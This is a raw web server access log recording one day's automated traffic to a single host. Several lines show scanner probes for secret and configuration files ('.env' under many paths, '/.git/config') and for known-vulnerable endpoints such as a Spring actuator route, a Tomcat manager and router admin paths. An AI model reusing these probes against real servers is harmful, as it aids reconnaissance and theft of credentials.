+[28/Jan/2026:11:18:36 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[28/Jan/2026:11:18:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:18:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:21:38 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 167.71.165.32] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[28/Jan/2026:11:21:38 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:11:26:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:35:05 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:41:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:11:44:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:48:24 +0000] 404 - GET http 91.82.215.191 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:11:48:50 +0000] 400 - GET http 91.82.215.191 "/" [Client 167.94.138.191] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:11:48:50 +0000] 400 - GET http 91.82.215.191 "/" [Client 206.168.34.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:11:48:51 +0000] 400 - - http localhost "-" [Client 167.94.138.191] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:11:48:54 +0000] 400 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 167.94.138.191] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:11:49:32 +0000] 400 - GET http 91.82.215.191 "/login" [Client 206.168.34.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:11:53:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:04:55 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:12:04:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 154.197.56.163] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:12:04:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 154.197.56.163] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:12:04:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 154.197.56.163] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:12:04:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 154.197.56.163] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:12:04:58 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:12:04:59 +0000] 404 - GET http 91.82.215.191 "/robots.txt" [Client 154.197.56.163] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:12:05:00 +0000] 404 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 154.197.56.163] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:12:05:00 +0000] 404 - GET http 91.82.215.191 "/sitemap.xml" [Client 154.197.56.163] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:12:05:02 +0000] 404 - GET http 91.82.215.191 "/llms.txt" [Client 154.197.56.163] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" +[28/Jan/2026:12:05:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[28/Jan/2026:12:05:14 +0000] 404 - GET http 91.82.215.191 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[28/Jan/2026:12:09:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:09:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:23:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:35:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:38:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:12:45:36 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:12:45:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:12:47:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[28/Jan/2026:12:54:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.143.120.234] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[28/Jan/2026:13:01:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.213] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:01:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.213] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:02:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:13:02:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:13:04:33 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:33 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:33 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:33 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:33 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:34 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:34 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:04:34 +0000] 400 - - http localhost "-" [Client 185.93.89.172] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:09:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 209.38.27.37] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[28/Jan/2026:13:09:54 +0000] 405 - POST http 91.82.215.191 "/" [Client 209.38.27.37] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:13:20:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:13:22:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:13:24:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:13:31:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:13:34:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:13:46:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:13:51:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:03:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:06:34 +0000] 400 - GET http 91.82.215.191 "/manager/text/list" [Client 20.163.16.165] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:14:15:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:20:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:14:21:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:30:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:41:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:46:14 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" "-" +[28/Jan/2026:14:46:54 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:51:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:14:57:40 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[28/Jan/2026:14:57:40 +0000] 404 - GET http 91.82.215.191 "/admin/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "More Firefox 1.5.0.10 user agents strings -->>" "-" +[28/Jan/2026:14:57:40 +0000] 404 - GET http 91.82.215.191 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/app/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E)" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/backend/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.1 Safari/603.1.23" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/demo/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.4.10-4GB i686) Opera 6.11 [en]" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/dev/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/mail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SGH-T989 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[28/Jan/2026:14:57:41 +0000] 404 - GET http 91.82.215.191 "/m/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QS 4.2.4.0; QS 5.3.0.4; InfoPath.1; QS 4.2.4.0; QS 5.3.0.4)" "-" +[28/Jan/2026:14:57:42 +0000] 404 - GET http 91.82.215.191 "/remote/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.00 (Windows NT 5.1; U; ja)" "-" +[28/Jan/2026:14:57:42 +0000] 404 - GET http 91.82.215.191 "/webmail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; rv:56.0) Gecko/20100101 Firefox/56.0" "-" +[28/Jan/2026:14:57:42 +0000] 404 - GET http 91.82.215.191 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-" +[28/Jan/2026:14:57:42 +0000] 404 - GET http 91.82.215.191 "/vpn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" "-" +[28/Jan/2026:14:57:44 +0000] 404 - GET http 91.82.215.191 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; tr) Opera 8.50" "-" +[28/Jan/2026:14:57:45 +0000] 404 - GET http 91.82.215.191 "/shop/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; Z828 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36" "-" +[28/Jan/2026:14:57:45 +0000] 404 - GET http 91.82.215.191 "/cloud/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" "-" +[28/Jan/2026:14:57:45 +0000] 404 - GET http 91.82.215.191 "/portal/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36" "-" +[28/Jan/2026:14:57:46 +0000] 404 - GET http 91.82.215.191 "/host/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36" "-" +[28/Jan/2026:14:57:46 +0000] 404 - GET http 91.82.215.191 "/support/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8.1.6) Gecko/20080115 Firefox/2.0.0.6" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/pop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/store/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/cdn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/dashboard/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB95/3.3.6.X (TOSHIBA, Si2156LG32, wireless)" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/test/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; H866C Build/HuaweiH866C) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/smtp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; BRI/1; .NET4.0C; BRI/2; AskTbX-SD/5.14.1.20007; .NET4.0E)" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" "-" +[28/Jan/2026:14:57:47 +0000] 404 - GET http 91.82.215.191 "/wiki/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00" "-" +[28/Jan/2026:14:57:48 +0000] 404 - GET http 91.82.215.191 "/help/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" "-" +[28/Jan/2026:14:57:48 +0000] 404 - GET http 91.82.215.191 "/blog/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)" "-" +[28/Jan/2026:15:07:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 92.83.216.226] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[28/Jan/2026:15:08:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:14:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:15:14:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:15:14:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:18:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.226.197.73] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[28/Jan/2026:15:19:42 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:20:48 +0000] 404 - GET http 91.82.215.191 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:15:24:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:25:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 192.241.154.87] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" "-" +[28/Jan/2026:15:28:55 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:15:32:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:35:11 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:46:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:15:49:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:15:49:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.152.52.217] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:15:49:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 104.152.52.217] [Length 1033] [Gzip -] "curl/7.61.1" "-" +[28/Jan/2026:15:49:58 +0000] 400 - GET http 91.82.215.191 "/" [Client 104.152.52.213] [Length 252] [Gzip -] "curl/7.61.1" "-" +[28/Jan/2026:15:49:58 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:15:49:58 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 104.152.52.213] [Length 252] [Gzip -] "curl/7.61.1" "-" +[28/Jan/2026:15:50:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.11.183.6] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:15:50:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 85.11.183.6] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[28/Jan/2026:15:58:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 